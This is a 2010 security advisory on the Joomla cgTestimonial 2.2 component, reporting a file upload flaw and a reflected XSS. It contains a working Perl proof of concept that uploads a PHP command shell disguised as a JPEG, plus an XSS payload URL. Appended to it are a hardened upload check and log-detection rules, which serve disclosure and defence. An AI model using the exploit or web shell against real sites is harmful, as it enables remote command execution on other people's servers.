Joomla cgTestimonial 2.2 Cross Site Scripting / Shell Upload

07 Aug 2010, reported by Salvatore Fresta. Type: packetstorm. Source: packetstormsecurity.com

Joomla cgTestimonial 2.2 Cross Site Scripting and File Upload Vulnerabilities

`cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities  
  
Name cgTestimonial  
Vendor http://www.cmsgalaxy.com  
Versions Affected 2.2  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-08-06  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
________________________  
  
The cgTestimonial component lets site users submit  
testimonials from the frontend and lets administrators  
manage and publish them from the backend.  
The extension places a testimonial form with several  
fields on one of the site's pages, so testimonials can  
be added either by users or by an administrator.  
  
  
II. DESCRIPTION  
_______________  
  
Some parameters are not properly sanitised. The following  
vulnerabilities can be exploited by unauthenticated (guest)  
users.  
  
  
III. ANALYSIS  
_____________  
  
Summary:  
  
A) Multiple Arbitrary File Upload  
B) XSS  
  
  
A) Multiple Arbitrary File Upload  
_________________________________  
  
The usr_img upload parameter handled by cgtestimonial.php  
(frontend) and by testimonial.php (admin, where no check at  
all is made) is not properly validated. The frontend's only  
check is on the Content-Type field of the uploaded part,  
which the client sets freely; the file name and extension  
are not validated and the file is stored under  
components/com_cgtestimonial/user_images/ with the name the  
client supplied. A PHP file declared as image/jpeg is  
therefore accepted and then executed by the web server.  
  
  
B) XSS  
______  
  
The url parameter of components/com_cgtestimonial/video.php  
is echoed into the page without HTML encoding, so an  
attacker-controlled value is reflected as markup  
(reflected XSS).  
  
  
IV. SAMPLE CODE  
_______________  
  
A) Multiple Arbitrary File Upload  
  
http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt  
  
B) XSS  
  
http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>  
  
  
V. FIX  
______  
  
No fix.  
  
################################ PoC-cgTestimonial2.2.pl ################################  
  
#!/usr/bin/perl  
#  
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component  
#  
# Author: Salvatore Fresta aka Drosophila  
# Email: salvatorefresta [at] gmail [dot] com  
#  
# Date: 06 August 2010  
#  
# Once uploaded, the shell runs commands via:  
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command  
#  
  
use strict;  
use warnings;  
use IO::Socket;  
  
my $usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".  
            "http://www.salvatorefresta.net\n\n".  
            "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";  
  
$#ARGV == 1 || die $usage;  
  
my $host = $ARGV[0];  
my $path = $ARGV[1];   # Joomla root with leading and trailing slash, e.g. /joomla/  
  
# Minimal PHP command shell that becomes the body of the uploaded "image"  
my $shell    = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";  
my $filename = "evil.php";  
my $upload   = $path."components/com_cgtestimonial/user_images/".$filename;  
  
# multipart/form-data body with a single usr_img part. The component only  
# looks at the part's Content-Type, so a .php file declared as image/jpeg passes.  
my $code = "--AaB03x\r\n".  
           "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".  
           "Content-Type: image/jpeg\r\n".  
           "\r\n".  
           "$shell\r\n".  
           "--AaB03x--\r\n";  
  
my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".  
          "Host: $host\r\n".  
          "Content-Type: multipart/form-data; boundary=AaB03x\r\n".  
          "Content-Length: ".length($code)."\r\n".  
          "Connection: close\r\n".  
          "\r\n".  
          $code;  
  
my $socket = IO::Socket::INET->new( Proto    => "tcp",  
                                    PeerAddr => $host,  
                                    PeerPort => "80"  
                                  ) or die "\n[-] Unable to connect to $host\n\n";  
  
print "\n[+] Connected\n";  
print $socket $pkg;  
  
# A successful submit is answered with a redirect (302 Found); any other  
# status line means the component rejected the request.  
my $status = <$socket>;  
close($socket);  
  
if (!defined $status || $status !~ /302 Found/) {  
    print "[-] Shell not uploaded\n";  
    exit;  
}  
  
# Confirm the file is really served from user_images/ on a fresh connection  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80" )  
    or die "\n[-] Unable to reconnect to $host\n\n";  
print $socket "GET ".$upload." HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";  
$status = <$socket>;  
close($socket);  
  
if (!defined $status || $status !~ /200 OK/) {  
    print "[-] Shell uploaded but not reachable at ".$host.$upload."\n";  
    exit;  
}  
  
print "[+] Shell uploaded on ".$host.$upload."\n".  
      "[+] Disconnected\n\n";  
`
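The upload check described in section III.A, worked through as an added example (this code is not from the advisory or from the cgTestimonial component; the function names, the image allowlist and the sample bodies are my own constructions): a small parser for the multipart body the Perl PoC builds, the weak Content-Type-only decision the advisory describes, and a hardened check beside it that validates the last extension against an allowlist, checks the file signature and stores the file under a server-generated name instead of the client's.

```python
import re
import secrets
from typing import Optional

BOUNDARY = "AaB03x"   # same boundary string the advisory's PoC uses

# Allowed extensions and the file signatures (magic bytes) each must start with.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}


def parse_multipart(body: bytes, boundary: str) -> list:
    """Minimal parser for the multipart/form-data layout the PoC builds.
    Returns one dict per part with name, filename, content_type and data."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.split(b"\r\n"):
            k, _, v = line.decode("latin-1").partition(":")
            headers[k.strip().lower()] = v.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?<!file)name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": fname.group(1) if fname else "",
            "content_type": headers.get("content-type", ""),
            "data": data[:-2] if data.endswith(b"\r\n") else data,
        })
    return parts


def vulnerable_accepts(part: dict) -> bool:
    """The check the advisory describes: only the client-supplied Content-Type
    is inspected, so "image/jpeg" on a .php file sails through."""
    return part["content_type"].lower().startswith("image/")


def hardened_accepts(part: dict) -> Optional[str]:
    """Returns a server-chosen storage name if the upload is acceptable, else None."""
    fname = part["filename"]
    ext = fname.rsplit(".", 1)[1].lower() if "." in fname else ""
    if ext not in ALLOWED:                    # allowlist on the LAST extension only
        return None
    if not any(part["data"].startswith(sig) for sig in ALLOWED[ext]):
        return None                           # signature must match the extension
    if b"<?php" in part["data"] or b"<?=" in part["data"]:
        return None                           # crude guard against image/PHP polyglots
    # Never store under the client's name: a random name defeats evil.php,
    # evil.php.jpg, path tricks and overwrites alike; the extension is the validated one.
    return f"{secrets.token_hex(16)}.{ext}"


def build_body(filename: str, content_type: str, data: bytes) -> bytes:
    """One-file body in the same layout as the advisory's Perl PoC (usr_img field)."""
    head = (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="usr_img"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n")
    return head.encode() + data + f"\r\n--{BOUNDARY}--".encode()


PHP_SHELL = b"<?php echo \"<pre>\"; system($_GET['cmd']); echo \"</pre>\"; ?>"
# Constructed inputs, not captured traffic.
POC_BODY = build_body("evil.php", "image/jpeg", PHP_SHELL)        # the advisory's attack
JPEG_BODY = build_body("me.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)
MISLABELLED_BODY = build_body("me.jpg", "image/jpeg", PHP_SHELL)  # right name, wrong bytes


def evaluate(body: bytes) -> dict:
    """Runs both checks over the usr_img part of a body."""
    part = next(p for p in parse_multipart(body, BOUNDARY) if p["name"] == "usr_img")
    return {"filename": part["filename"],
            "vulnerable": vulnerable_accepts(part),
            "hardened": hardened_accepts(part)}


if __name__ == "__main__":
    for label, body in [("PoC", POC_BODY), ("jpeg", JPEG_BODY), ("mislabelled", MISLABELLED_BODY)]:
        print(label, evaluate(body))
```

Run it and the PoC body passes the Content-Type check but is rejected by the hardened one; the genuine JPEG passes both and comes back with a random `.jpg` name. The random name also covers the case the extension allowlist alone does not: a server configured to run `.php.jpg` through the PHP handler.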

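The requests in section IV, turned into detection logic as an added example (not from the advisory; the access-log lines are constructed, the log format is assumed to be Apache/nginx "combined", and the indicator names are my own): it flags the PoC's submit POST, script files fetched from user_images/, the ?cmd= web-shell parameter and script payloads in video.php?url=, and correlates an upload followed by execution from the same client.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache/nginx "combined" access-log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

UPLOAD_DIR = "/components/com_cgtestimonial/user_images/"
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml")
XSS_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)


def classify(line: str):
    """Returns (ip, [indicators]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlparse(m["target"])
    path = unquote(target.path).lower()
    qs = parse_qs(target.query, keep_blank_values=True)   # parse_qs percent-decodes values
    hits = []

    # 1) the submit endpoint the PoC POSTs its multipart body to
    if (m["method"] == "POST" and path.endswith("/index.php")
            and qs.get("option") == ["com_cgtestimonial"] and qs.get("task") == ["submit"]):
        hits.append("cgtestimonial-submit")

    # 2) a script file served from the image upload directory (where evil.php lands)
    if UPLOAD_DIR in path and path.endswith(SCRIPT_EXTS):
        hits.append("php-in-user_images")
        if "cmd" in qs:                      # the PoC shell's command parameter
            hits.append("webshell-cmd")

    # 3) the reflected XSS sink: video.php?url=<payload>
    if path.endswith("/components/com_cgtestimonial/video.php"):
        if any(XSS_RE.search(v) for v in qs.get("url", [])):
            hits.append("video.php-xss")

    return m["ip"], hits


def scan(lines):
    """Returns [(ip, indicators)] for lines that triggered at least one indicator."""
    out = []
    for line in lines:
        res = classify(line)
        if res and res[1]:
            out.append(res)
    return out


def upload_then_execute(lines):
    """IPs that hit the submit endpoint and later fetched a script from user_images/:
    the full PoC sequence, a stronger signal than either event alone."""
    submitted, executed = set(), set()
    for ip, hits in scan(lines):
        if "cgtestimonial-submit" in hits:
            submitted.add(ip)
        if "php-in-user_images" in hits and ip in submitted:
            executed.add(ip)
    return executed


# Constructed log lines, not real traffic. Lines 1-2 mirror the Perl PoC, line 3 the XSS
# sample request; lines 4-5 are benign component traffic that must not fire.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Aug/2010:10:01:02 +0000] "POST /joomla/index.php?option=com_cgtestimonial&task=submit HTTP/1.1" 302 0',
    '203.0.113.7 - - [07/Aug/2010:10:01:03 +0000] "GET /joomla/components/com_cgtestimonial/user_images/evil.php?cmd=id HTTP/1.1" 200 512',
    '198.51.100.9 - - [07/Aug/2010:10:02:15 +0000] "GET /joomla/components/com_cgtestimonial/video.php?url=%22%3E%3Cscript%3Ealert(%27xss%27)%3B%3C/script%3E HTTP/1.1" 200 913',
    '192.0.2.44 - - [07/Aug/2010:10:03:00 +0000] "GET /joomla/components/com_cgtestimonial/user_images/photo.jpg HTTP/1.1" 200 20411',
    '192.0.2.44 - - [07/Aug/2010:10:03:01 +0000] "GET /joomla/index.php?option=com_cgtestimonial HTTP/1.1" 200 7320',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
    print("upload then execute:", upload_then_execute(SAMPLE_LOG))
```

The POST to the submit endpoint on its own is legitimate use of the component, so it is reported but only becomes actionable when the same client then requests a script file from user_images/; the `?cmd=` parameter and any script file under that directory are high-confidence on their own, since the directory should only ever serve images.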